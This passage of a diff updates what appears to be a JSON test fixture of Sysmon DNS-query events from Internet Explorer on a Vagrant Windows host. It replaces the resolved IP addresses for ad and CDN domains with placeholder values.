"{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5670,7 +5670,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5682,7 +5682,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5696,7 +5696,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.822", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5739,7 +5739,7 @@ "ProcessId": "2736", "QueryName": "status.thawte.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -5754,7 +5754,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5766,7 +5766,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5774,7 +5774,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;", + "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.860", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5817,7 +5817,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -5830,7 +5830,7 @@ "version": 5, "time_created": "2019-07-18T03:34:06.051Z", "event_data": { - "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.904", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5858,7 +5858,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -5876,7 +5876,7 @@ "ProcessId": "2736", "QueryName": "match.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;", + "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -5919,7 +5919,7 @@ "ProcessId": "2736", "QueryName": "img-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;", + "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.056" }, 
@@ -5929,7 +5929,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
